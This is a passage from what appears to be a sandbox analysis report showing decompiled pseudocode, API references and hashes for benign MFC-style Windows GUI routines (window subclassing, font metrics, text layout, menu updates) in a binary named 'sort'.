                                            • Opcode ID: cac131d4966f25c1f2986bdc59dfc1c95fe9cab75364f357d42edf9083789053
                                            • Instruction ID: 71934383aa5695cd313cdbbfccdfa0b0166ee7a8a5881c634a4d6990b46abeb0
                                            • Opcode Fuzzy Hash: cac131d4966f25c1f2986bdc59dfc1c95fe9cab75364f357d42edf9083789053
                                            • Instruction Fuzzy Hash: 5461A5B1A00609EFDF21DF65CC85AEF7BB9EF44304F10452AF92696291C738D982CB55
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 81%
                                            			E00413821(void* __ecx, void* __edx) {
                                            				_Unknown_base(*)()* _t33;
                                            				void* _t35;
                                            				void* _t36;
                                            				void* _t41;
                                            				void* _t44;
                                            				long _t54;
                                            				signed int _t58;
                                            				void* _t61;
                                            				void* _t66;
                                            				struct HWND__* _t68;
                                            				CHAR* _t71;
                                            				void* _t74;
                                            				void* _t75;
                                            				void* _t77;
                                            
                                            				_t66 = __edx;
                                            				_t61 = __ecx;
                                            				E00406520(E00429E08, _t75);
                                            				_t68 =  *(_t75 + 8);
                                            				_t71 = "AfxOldWndProc423";
                                            				 *((intOrPtr*)(_t75 - 0x10)) = _t77 - 0x40;
                                            				_t33 = GetPropA(_t68, _t71);
                                            				 *(_t75 - 0x14) =  *(_t75 - 0x14) & 0x00000000;
                                            				 *(_t75 - 4) =  *(_t75 - 4) & 0x00000000;
                                            				 *(_t75 - 0x18) = _t33;
                                            				_t35 =  *(_t75 + 0xc) - 6;
                                            				_t58 = 1;
                                            				if(_t35 == 0) {
                                            					_t36 = E00413740(_t75,  *(_t75 + 0x14));
                                            					E004134A8(_t61, E00413740(_t75, _t68),  *(_t75 + 0x10), _t36);
                                            					goto L9;
                                            				} else {
                                            					_t41 = _t35 - 0x1a;
                                            					if(_t41 == 0) {
                                            						_t58 = 0 | E00413509(E00413740(_t75, _t68),  *(_t75 + 0x14),  *(_t75 + 0x14) >> 0x10) == 0x00000000;
                                            						L9:
                                            						if(_t58 != 0) {
                                            							goto L10;
                                            						}
                                            					} else {
                                            						_t44 = _t41 - 0x62;
                                            						if(_t44 == 0) {
                                            							SetWindowLongA(_t68, 0xfffffffc,  *(_t75 - 0x18));
                                            							RemovePropA(_t68, _t71);
                                            							GlobalDeleteAtom(GlobalFindAtomA(_t71));
                                            							goto L10;
                                            						} else {
                                            							if(_t44 != 0x8e) {
                                            								L10:
                                            								 *(_t75 - 0x14) = CallWindowProcA( *(_t75 - 0x18), _t68,  *(_t75 + 0xc),  *(_t75 + 0x10),  *(_t75 + 0x14));
                                            							} else {
                                            								_t74 = E00413740(_t75, _t68);
                                            								E0041340C(_t74, _t75 - 0x30, _t75 - 0x1c);
                                            								_t54 = CallWindowProcA( *(_t75 - 0x18), _t68, 0x110,  *(_t75 + 0x10),  *(_t75 + 0x14));
                                            								_push( *((intOrPtr*)(_t75 - 0x1c)));
                                            								 *(_t75 - 0x14) = _t54;
                                            								_push(_t75 - 0x30);
                                            								_push(_t74);
                                            								E0041342F(_t66);
                                            							}
                                            						}
                                            					}
                                            				}
                                            				 *[fs:0x0] =  *((intOrPtr*)(_t75 - 0xc));
                                            				return  *(_t75 - 0x14);
                                            			}

                                            APIs
                                            • __EH_prolog.LIBCMT ref: 00413826
                                            • GetPropA.USER32 ref: 0041383E
                                            • CallWindowProcA.USER32 ref: 0041389C
                                              • Part of subcall function 0041342F: GetWindowRect.USER32 ref: 00413454
                                              • Part of subcall function 0041342F: GetWindow.USER32(?,00000004), ref: 00413471
                                            • SetWindowLongA.USER32 ref: 004138CC
                                            • RemovePropA.USER32 ref: 004138D4
                                            • GlobalFindAtomA.KERNEL32 ref: 004138DB
                                            • GlobalDeleteAtom.KERNEL32 ref: 004138E2
                                              • Part of subcall function 0041340C: GetWindowRect.USER32 ref: 00413418
                                            • CallWindowProcA.USER32 ref: 00413936
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prologLongRemove
                                            • String ID: AfxOldWndProc423
                                            • API String ID: 2397448395-1060338832
                                            • Opcode ID: ffe45afd7699b5a41d516579d2a7d3dc4d15bd4e98b8a7e359cf5195de427134
                                            • Instruction ID: 4899527f46ba9a8eebcd092d04d92ea77ba6043ae45329b01eeefbc2baec0ec1
                                            • Opcode Fuzzy Hash: ffe45afd7699b5a41d516579d2a7d3dc4d15bd4e98b8a7e359cf5195de427134
                                            • Instruction Fuzzy Hash: F3316F7290011ABBCB12AFA5DD49EFF7FB8EF09712F00402AF501A2151C7799A519BA9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E004251B9() {
                                            				int _t1;
                                            				int _t7;
                                            				struct HDC__* _t12;
                                            				void* _t18;
                                            
                                            				_t1 =  *0x436880; // 0xffffffff
                                            				if(_t1 == 0xffffffff) {
                                            					_t12 = GetDC(0);
                                            					_t18 = CreateFontA(GetSystemMetrics(0x48), 0, 0, 0, 0x190, 0, 0, 0, 2, 0, 0, 0, 0, "Marlett");
                                            					if(_t18 != 0) {
                                            						_t18 = SelectObject(_t12, _t18);
                                            					}
                                            					GetCharWidthA(_t12, 0x36, 0x36, 0x436880);
                                            					if(_t18 != 0) {
                                            						SelectObject(_t12, _t18);
                                            						DeleteObject(_t18);
                                            					}
                                            					ReleaseDC(0, _t12);
                                            					_t7 =  *0x436880; // 0xffffffff
                                            					return _t7;
                                            				}
                                            				return _t1;
                                            			}

                                            APIs
                                            • GetDC.USER32(00000000), ref: 004251CA
                                            • GetSystemMetrics.USER32 ref: 004251EA
                                            • CreateFontA.GDI32(00000000,?,?,00425352,00001000,?,?), ref: 004251F1
                                            • SelectObject.GDI32(00000000,00000000), ref: 00425205
                                            • GetCharWidthA.GDI32(00000000,00000036,00000036,00436880), ref: 00425213
                                            • SelectObject.GDI32(00000000,00000000), ref: 0042521F
                                            • DeleteObject.GDI32(00000000), ref: 00425222
                                            • ReleaseDC.USER32 ref: 0042522A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: Object$Select$CharCreateDeleteFontMetricsReleaseSystemWidth
                                            • String ID: Marlett
                                            • API String ID: 1397664628-3688754224
                                            • Opcode ID: 7241a4e70ab03fdb0c4814db81f8993fad58ad3ff119ab58904e5ceeffb10693
                                            • Instruction ID: 574e7069028db96244f8dd859ef817299f0475ae2c7f4c91e639d061ecb05676
                                            • Opcode Fuzzy Hash: 7241a4e70ab03fdb0c4814db81f8993fad58ad3ff119ab58904e5ceeffb10693
                                            • Instruction Fuzzy Hash: A901A2317413507BC2312B266C8DE6B3F7CD7CBFA1B914225F515A2190CB654C01C6BC
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E004037D0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, signed int _a44) {
                                            				void* _t21;
                                            
                                            				if(_a44 < 0 || _a44 >= 0x14) {
                                            					_a44 = 0;
                                            				}
                                            				_t21 =  *((intOrPtr*)(0x4362b0 + _a44 * 4))(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40);
                                            				return _t21;
                                            			}

                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8a9b55a29c4ff860124db4037a09d88fdcf40b724d14769906d711a8e0ebbbae
                                            • Instruction ID: c8df5cefcab56e12fb6afff3c38bb4f7a638dfcd913fb832871c6968f8fa9c0e
                                            • Opcode Fuzzy Hash: 8a9b55a29c4ff860124db4037a09d88fdcf40b724d14769906d711a8e0ebbbae
                                            • Instruction Fuzzy Hash: 4EF1E4B2A00108EBCB04CF99D995EEE77B9BF8C308F118259F919A7240D735EA15CF95
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 97%
                                            			E0042914E(void* __ecx, long* _a4, int* _a8, int _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr* _a28, intOrPtr _a32, char* _a36, int* _a40, signed int* _a44) {
                                            				intOrPtr _v8;
                                            				int _v12;
                                            				int _v16;
                                            				int _v20;
                                            				signed int _v24;
                                            				CHAR* _v28;
                                            				int _v32;
                                            				signed int _v36;
                                            				signed int _v40;
                                            				struct tagSIZE _v48;
                                            				struct tagPOINT _v56;
                                            				struct tagSIZE _v64;
                                            				struct tagTEXTMETRICA _v120;
                                            				struct tagTEXTMETRICA _v176;
                                            				signed int _t119;
                                            				signed int _t120;
                                            				int _t121;
                                            				signed int* _t125;
                                            				long* _t127;
                                            				signed int _t131;
                                            				signed char _t132;
                                            				int _t140;
                                            				signed char* _t142;
                                            				int _t144;
                                            				int _t149;
                                            				int _t153;
                                            				signed int _t156;
                                            				signed short _t159;
                                            				signed char* _t167;
                                            				int* _t170;
                                            				signed int _t174;
                                            				int _t175;
                                            				int _t185;
                                            				signed int _t187;
                                            				int _t189;
                                            				int _t190;
                                            				void* _t191;
                                            				int* _t193;
                                            
                                            				_t191 = __ecx;
                                            				GetTextMetricsA( *(__ecx + 8),  &_v120);
                                            				GetTextMetricsA( *(__ecx + 4),  &_v176);
                                            				GetTextExtentPoint32A( *(__ecx + 8), 0x42e890, 1,  &_v48);
                                            				_t119 = GetTextAlign( *(__ecx + 8));
                                            				_v40 = _t119;
                                            				_t120 = _t119 & 0x00000001;
                                            				_v36 = _t120;
                                            				if(_t120 == 0) {
                                            					_t170 = _a8;
                                            				} else {
                                            					GetCurrentPositionEx( *(__ecx + 4),  &_v56);
                                            					_t170 = _a8;
                                            					 *_t170 = _v56.x;
                                            				}
                                            				_t121 =  *_t170;
                                            				_t193 = _a40;
                                            				_t167 = _a12;
                                            				_t185 = 0;
                                            				_v28 = _t167;
                                            				_v32 = _t121;
                                            				_a12 = _t121;
                                            				_v12 = 0;
                                            				_v20 = 0;
                                            				if(_a20 != 0) {
                                            					if(_a24 != 1) {
                                            						_t159 = GetTabbedTextExtentA( *(_t191 + 8), 0x42e88c, 1, 0, 0);
                                            						_t170 = _a8;
                                            						_t185 = 0;
                                            						_v20 = _t159 & 0x0000ffff;
                                            					} else {
                                            						_v20 =  *_a28;
                                            					}
                                            				}
                                            				_v8 = _t185;
                                            				if( *_a16 <= _t185) {
                                            					L31:
                                            					_t187 = _v40 & 0x00000006;
                                            					_v48.cx = _a12 -  *_t170;
                                            					_t125 = _a44;
                                            					 *_t125 =  *_t125 & 0x00000000;
                                            					if(_t187 != 0) {
                                            						if(_t187 != 6) {
                                            							if(_t187 == 2) {
                                            								 *_t125 = _v12;
                                            							}
                                            							L38:
                                            							if(_v36 != 0) {
                                            								MoveToEx( *(_t191 + 4),  *_t170, _v56.y, 0);
                                            							}
                                            							 *_a16 = _t193 - _a40 >> 2;
                                            							_t127 = _a4;
                                            							 *_t127 = _v48.cx;
                                            							_t127[1] = _v48.cy;
                                            							return _t127;
                                            						}
                                            						asm("cdq");
                                            						_t131 = _v12 - _t187 >> 1;
                                            						L33:
                                            						 *_t170 =  *_t170 + _t131;
                                            						goto L38;
                                            					}
                                            					_t131 = _v12;
                                            					goto L33;
                                            				} else {
                                            					while(1) {
                                            						_t132 =  *_t167;
                                            						_t174 = 0 | _t132 == _v120.tmBreakChar;
                                            						_v24 = _t174;
                                            						if(_t174 != _t185 || _a20 != _t185 && _t132 == 9) {
                                            							GetTextExtentPoint32A( *(_t191 + 8), _v28, _v24 - _v28 + _t167,  &_v64);
                                            							_t140 = _v64.cx - _v120.tmOverhang + _v32;
                                            							if(_v24 == 0) {
                                            								_t140 = E0042911A(_t140, _a24, _a28, _a32, _v20);
                                            							}
                                            							_t175 = _t140;
                                            							if(_t193 != _a40) {
                                            								 *((intOrPtr*)(_t193 - 4)) =  *((intOrPtr*)(_t193 - 4)) + _t175 - _a12;
                                            							} else {
                                            								_v12 = _v12 + _t175 - _a12;
                                            							}
                                            							_a12 = _t140;
                                            							_v32 = _t140;
                                            							_v28 =  &(_t167[1]);
                                            						} else {
                                            							_t144 = _t132 & 0x000000ff;
                                            							if(( *(_t144 + 0x43b761) & 0x00000004) == 0) {
                                            								GetCharWidthA( *(_t191 + 4), _t144, _t144,  &_v16);
                                            								if(GetCharWidthA( *(_t191 + 8),  *_t167 & 0x000000ff,  *_t167 & 0x000000ff, _t193) == 0) {
                                            									 *_t193 = _v120.tmAveCharWidth;
                                            								}
                                            								_t189 = _v16;
                                            							} else {
                                            								_t189 = _v176.tmAveCharWidth;
                                            								 *_t193 = _v120.tmAveCharWidth;
                                            							}
                                            							_t190 = _t189 - _v176.tmOverhang;
                                            							 *_t193 =  *_t193 - _v120.tmOverhang;
                                            							_t149 =  *_t193;
                                            							_a12 = _a12 + _t149;
                                            							_v16 = _t190;
                                            							if(_t193 != _a40) {
                                            								asm("cdq");
                                            								_t156 = _t149 - _t190 - _t190 >> 1;
                                            								 *((intOrPtr*)(_t193 - 4)) =  *((intOrPtr*)(_t193 - 4)) + _t156;
                                            								 *_t193 = _t149 - _t156;
                                            							}
                                            							_a36 = _a36 + 1;
                                            							 *_a36 =  *_t167;
                                            							if(( *(( *_t167 & 0x000000ff) + 0x43b761) & 0x00000004) != 0) {
                                            								_a36 = _a36 + 1;
                                            								 *_a36 = _t167[1];
                                            								_t153 =  *_t193;
                                            								_a12 = _a12 + _t153;
                                            								_t193 =  &(_t193[1]);
                                            								_v8 = _v8 + 1;
                                            								 *_t193 = _t153;
                                            							}
                                            							_t193 =  &(_t193[1]);
                                            						}
                                            						_t142 = E00406AFA(_t167);
                                            						_v8 = _v8 + 1;
                                            						_t167 = _t142;
                                            						if(_v8 >=  *_a16) {
                                            							break;
                                            						}
                                            						_t185 = 0;
                                            					}
                                            					_t170 = _a8;
                                            					goto L31;
                                            				}
                                            			}

                                            APIs
                                            • GetTextMetricsA.GDI32(?,?), ref: 00429168
                                            • GetTextMetricsA.GDI32(?,?), ref: 00429174
                                            • GetTextExtentPoint32A.GDI32(?,0042E890,00000001,?), ref: 00429184
                                            • GetTextAlign.GDI32(?), ref: 0042918D
                                            • GetCurrentPositionEx.GDI32(?,?), ref: 004291A5
                                            • GetTabbedTextExtentA.USER32(?,0042E88C,00000001,00000000,00000000), ref: 004291F3
                                            • GetCharWidthA.GDI32(?,?,?,?), ref: 0042925A
                                            • GetCharWidthA.GDI32(?,00000000,00000000,?), ref: 00429269
                                            • GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 004292E9
                                            • MoveToEx.GDI32(?,?,?,00000000), ref: 00429397
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: Text$Extent$CharMetricsPoint32Width$AlignCurrentMovePositionTabbed
                                            • String ID:
                                            • API String ID: 2070200100-0
                                            • Opcode ID: dbc0e650c6b3921614c61be6481f5bcec17f5e74d2995e425cda8442065db2ea
                                            • Instruction ID: 5ee3fa6e800e5c42c7f25724716c3f9a342090dd9abbfd9a25ef7c0a74f7065c
                                            • Opcode Fuzzy Hash: dbc0e650c6b3921614c61be6481f5bcec17f5e74d2995e425cda8442065db2ea
                                            • Instruction Fuzzy Hash: EE914670A0021AEFCF15CFA8D884AEEBBB5FF48304F54856AE859A7250D334AD51CF64
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 75%
                                            			E0042185A(intOrPtr __ecx, intOrPtr _a4, intOrPtr _a8, int _a12) {
                                            				intOrPtr _v8;
                                            				intOrPtr _v12;
                                            				int _v16;
                                            				signed int _v32;
                                            				intOrPtr _v36;
                                            				signed int _v40;
                                            				int _v44;
                                            				char _v48;
                                            				void* __ebp;
                                            				int _t53;
                                            				int _t58;
                                            				int _t61;
                                            				signed int _t65;
                                            				int _t66;
                                            				void* _t67;
                                            				int _t69;
                                            				intOrPtr _t73;
                                            				int _t74;
                                            				int _t75;
                                            				intOrPtr* _t77;
                                            				struct HMENU__* _t83;
                                            				intOrPtr _t84;
                                            
                                            				_t73 = __ecx;
                                            				_v8 = __ecx;
                                            				_t53 = E0041A8B4( *((intOrPtr*)(__ecx + 0x1c)));
                                            				if(_a12 == 0) {
                                            					_t77 =  *((intOrPtr*)(__ecx + 0x68));
                                            					_t84 = _a4;
                                            					if(_t77 == 0) {
                                            						L3:
                                            						E00412F9D( &_v48);
                                            						_v36 = _t84;
                                            						if( *((intOrPtr*)(E004249C4() + 0x54)) !=  *(_t84 + 4)) {
                                            							if(GetMenu( *(_t73 + 0x1c)) != 0) {
                                            								_t67 = E00414CEF(_t73);
                                            								if(_t67 != 0) {
                                            									_t83 = GetMenu( *(_t67 + 0x1c));
                                            									if(_t83 != 0) {
                                            										_t69 = GetMenuItemCount(_t83);
                                            										_t75 = 0;
                                            										_a12 = _t69;
                                            										if(_t69 > 0) {
                                            											while(GetSubMenu(_t83, _t75) !=  *(_t84 + 4)) {
                                            												_t75 = _t75 + 1;
                                            												if(_t75 < _a12) {
                                            													continue;
                                            												} else {
                                            												}
                                            												goto L13;
                                            											}
                                            											_push(_t83);
                                            											_v12 = E00417635();
                                            										}
                                            										L13:
                                            										_t73 = _v8;
                                            									}
                                            								}
                                            							}
                                            						} else {
                                            							_v12 = _t84;
                                            						}
                                            						_t53 = GetMenuItemCount( *(_t84 + 4));
                                            						_v40 = _v40 & 0x00000000;
                                            						_v16 = _t53;
                                            						if(_t53 > 0) {
                                            							do {
                                            								_t58 = GetMenuItemID( *(_t84 + 4), _v40);
                                            								_v44 = _t58;
                                            								if(_t58 != 0) {
                                            									if(_t58 != 0xffffffff) {
                                            										_v32 = _v32 & 0x00000000;
                                            										if( *((intOrPtr*)(_t73 + 0x3c)) != 0 && _t58 < 0xf000) {
                                            											_push(1);
                                            											_pop(0);
                                            										}
                                            										_push(0);
                                            										goto L27;
                                            									} else {
                                            										_push(GetSubMenu( *(_t84 + 4), _v40));
                                            										_t65 = E00417635();
                                            										_v32 = _t65;
                                            										if(_t65 != 0) {
                                            											_t66 = GetMenuItemID( *(_t65 + 4), 0);
                                            											_v44 = _t66;
                                            											if(_t66 != 0 && _t66 != 0xffffffff) {
                                            												_push(0);
                                            												L27:
                                            												_push(_t73);
                                            												E00413162( &_v48);
                                            												_t61 = GetMenuItemCount( *(_t84 + 4));
                                            												_t74 = _t61;
                                            												if(_t74 < _v16) {
                                            													_v40 = _v40 + _t61 - _v16;
                                            													while(_v40 < _t74 && GetMenuItemID( *(_t84 + 4), _v40) == _v44) {
                                            														_v40 = _v40 + 1;
                                            													}
                                            												}
                                            												_v16 = _t74;
                                            												_t73 = _v8;
                                            											}
                                            										}
                                            									}
                                            								}
                                            								_v40 = _v40 + 1;
                                            								_t53 = _v40;
                                            							} while (_t53 < _v16);
                                            						}
                                            					} else {
                                            						_t53 =  *((intOrPtr*)( *_t77 + 0x74))(_t84, _a8, 0);
                                            						if(_t53 == 0) {
                                            							goto L3;
                                            						}
                                            					}
                                            				}
                                            				return _t53;
                                            			}

                                            APIs
                                              • Part of subcall function 0041A8B4: GetFocus.USER32(?,?,?,00421870,?), ref: 0041A8B7
                                              • Part of subcall function 0041A8B4: GetParent.USER32(00000000), ref: 0041A8DE
                                              • Part of subcall function 0041A8B4: GetWindowLongA.USER32 ref: 0041A8F9
                                              • Part of subcall function 0041A8B4: GetParent.USER32(?), ref: 0041A907
                                              • Part of subcall function 0041A8B4: GetDesktopWindow.USER32 ref: 0041A90B
                                              • Part of subcall function 0041A8B4: SendMessageA.USER32(00000000,0000014F,00000000,00000000), ref: 0041A91F
                                            • GetMenu.USER32(?), ref: 004218BD
                                            • GetMenu.USER32(?), ref: 004218D1
                                            • GetMenuItemCount.USER32 ref: 004218DA
                                            • GetSubMenu.USER32 ref: 004218EB
                                            • GetMenuItemCount.USER32 ref: 0042190D
                                            • GetMenuItemID.USER32(?,00000000), ref: 0042192E
                                            • GetSubMenu.USER32 ref: 00421946
                                            • GetMenuItemID.USER32(?,00000000), ref: 0042195E
                                            • GetMenuItemCount.USER32 ref: 00421995
                                            • GetMenuItemID.USER32(?,00000000), ref: 004219B3
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: Menu$Item$Count$ParentWindow$DesktopFocusLongMessageSend
                                            • String ID:
                                            • API String ID: 4186786570-0
                                            • Opcode ID: 6dca45552e476573e8ddd484fced48f908dc2b4a0e5e43a68bf7886d0696cfe4
                                            • Instruction ID: c2df077858419d5e37a5876f97d7879e649ce0b97625e1102e6641939069eb9a
                                            • Opcode Fuzzy Hash: 6dca45552e476573e8ddd484fced48f908dc2b4a0e5e43a68bf7886d0696cfe4
                                            • Instruction Fuzzy Hash: C35190B0B002189FCF11EF65D990BAEB7B5EF18314FA0446AE411E6261D739DD82DF68
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 71%
                                            			E00420900() {
                                            				void* __ecx;
                                            				void* __ebp;
                                            				struct HWND__* _t21;
                                            				int _t33;
                                            				void* _t40;
                                            				void* _t41;
                                            				struct HWND__* _t46;
                                            				struct HWND__* _t47;
                                            				signed int _t48;
                                            				signed int _t49;
                                            				void* _t50;
                                            
                                            				_t40 = _t41;
                                            				 *(_t40 + 0xa0) =  *(_t40 + 0xa0) + 1;
                                            				_t21 = _t40 + 0xa0;
                                            				if( *(_t40 + 0xa0) > 1) {
                                            					L18:
                                            					return _t21;
                                            				}
                                            				 *((intOrPtr*)(_t50 + 0x14)) = E00414CEF(_t41);
                                            				_t48 = 0;
                                            				_t21 = GetWindow(GetDesktopWindow(), 5);
                                            				_t46 = _t21;
                                            				if(_t46 == 0) {
                                            					goto L18;
                                            				} else {
                                            					goto L2;
                                            				}
                                            				do {
                                            					L2:
                                            					if(IsWindowEnabled(_t46) != 0) {
                                            						_push(_t46);
                                            						if(E00413767() != 0 && E004208E0( *((intOrPtr*)( *((intOrPtr*)(_t50 + 0x10)) + 0x1c)), _t46) != 0 && SendMessageA(_t46, 0x36c, 0, 0) == 0) {
                                            							_t48 = _t48 + 1;
                                            						}
                                            					}
                                            					_t21 = GetWindow(_t46, 2);
                                            					_t46 = _t21;
                                            				} while (_t46 != 0);
                                            				if(_t48 != 0) {
                                            					 *(_t40 + 0xa4) = E004131DD(4 + _t48 * 4);
                                            					_push(5);
                                            					_t49 = 0;
                                            					_push(GetDesktopWindow());
                                            					while(1) {
                                            						_t47 = GetWindow();
                                            						if(_t47 == 0) {
                                            							break;
                                            						}
                                            						if(IsWindowEnabled(_t47) != 0) {
                                            							_push(_t47);
                                            							if(E00413767() != 0 && E004208E0( *((intOrPtr*)( *((intOrPtr*)(_t50 + 0x10)) + 0x1c)), _t47) != 0) {
                                            								_t33 = SendMessageA(_t47, 0x36c, 0, 0);
                                            								if(_t33 == 0) {
                                            									EnableWindow(_t47, _t33);
                                            									( *(_t40 + 0xa4))[_t49] = _t47;
                                            									_t49 = _t49 + 1;
                                            								}
                                            							}
                                            						}
                                            						_push(2);
                                            						_push(_t47);
                                            					}
                                            					_t21 =  *(_t40 + 0xa4);
                                            					_t21[_t49] = _t21[_t49] & 0x00000000;
                                            				}
                                            			}















                                            APIs
                                            • GetDesktopWindow.USER32 ref: 0042092D
                                            • GetWindow.USER32(00000000), ref: 0042093A
                                            • IsWindowEnabled.USER32(00000000), ref: 00420947
                                            • SendMessageA.USER32(00000000,0000036C,00000000,00000000), ref: 00420976
                                            • GetWindow.USER32(00000000,00000002), ref: 00420984
                                            • GetDesktopWindow.USER32 ref: 004209AC
                                            • GetWindow.USER32(00000000), ref: 004209B3
                                            • IsWindowEnabled.USER32(00000000), ref: 004209BC
                                            • SendMessageA.USER32(00000000,0000036C,00000000,00000000), ref: 004209EB
                                            • EnableWindow.USER32(00000000,00000000), ref: 004209F7
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: Window$DesktopEnabledMessageSend$Enable
                                            • String ID:
                                            • API String ID: 2339141687-0
                                            • Opcode ID: b425f5d9508085c9cae4404486b252f16e1b35d7c8077e0574aa4d7a51abd98b
                                            • Instruction ID: 9d4a9da4e21fb217c8a7ce5c71c2f292f8e7f618580f1a2ae5b0fad087dd6ca4
                                            • Opcode Fuzzy Hash: b425f5d9508085c9cae4404486b252f16e1b35d7c8077e0574aa4d7a51abd98b
                                            • Instruction Fuzzy Hash: 6B31B1717013286FE731AF25AC05B6B779CEF01795F850026FE41DA293DB68C8418AED
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0041EC61(void* __ecx, int _a4) {
                                            				int _v8;
                                            				struct tagRECT _v24;
                                            				int _t39;
                                            				int _t42;
                                            				int _t61;
                                            				int _t64;
                                            				void* _t66;
                                            				long _t67;
                                            				int _t69;
                                            
                                            				_t67 = _a4;
                                            				_t66 = __ecx;
                                            				_t39 = DefWindowProcA( *(__ecx + 0x1c), 0x46, 0, _t67);
                                            				if(( *(_t67 + 0x18) & 0x00000001) == 0) {
                                            					GetWindowRect( *(_t66 + 0x1c),  &_v24);
                                            					_t42 = _a4;
                                            					_t69 = _v24.right - _v24.left;
                                            					_t64 =  *(_t42 + 0x10);
                                            					_t61 = _v24.bottom - _v24.top;
                                            					_t39 =  *(_t42 + 0x14);
                                            					_v8 = _t64;
                                            					_a4 = _t39;
                                            					if(_t64 != _t69 && ( *(_t66 + 0x65) & 0x00000004) != 0) {
                                            						SetRect( &_v24, _t64 -  *0x439bf0, 0, _t64, _t39);
                                            						InvalidateRect( *(_t66 + 0x1c),  &_v24, 1);
                                            						SetRect( &_v24, _t69 -  *0x439bf0, 0, _t69, _a4);
                                            						InvalidateRect( *(_t66 + 0x1c),  &_v24, 1);
                                            						_t64 = _v8;
                                            						_t39 = _a4;
                                            					}
                                            					if(_t39 != _t61 && ( *(_t66 + 0x65) & 0x00000008) != 0) {
                                            						SetRect( &_v24, 0, _t39 -  *0x439bf4, _t64, _t39);
                                            						InvalidateRect( *(_t66 + 0x1c),  &_v24, 1);
                                            						SetRect( &_v24, 0, _t61 -  *0x439bf4, _v8, _t61);
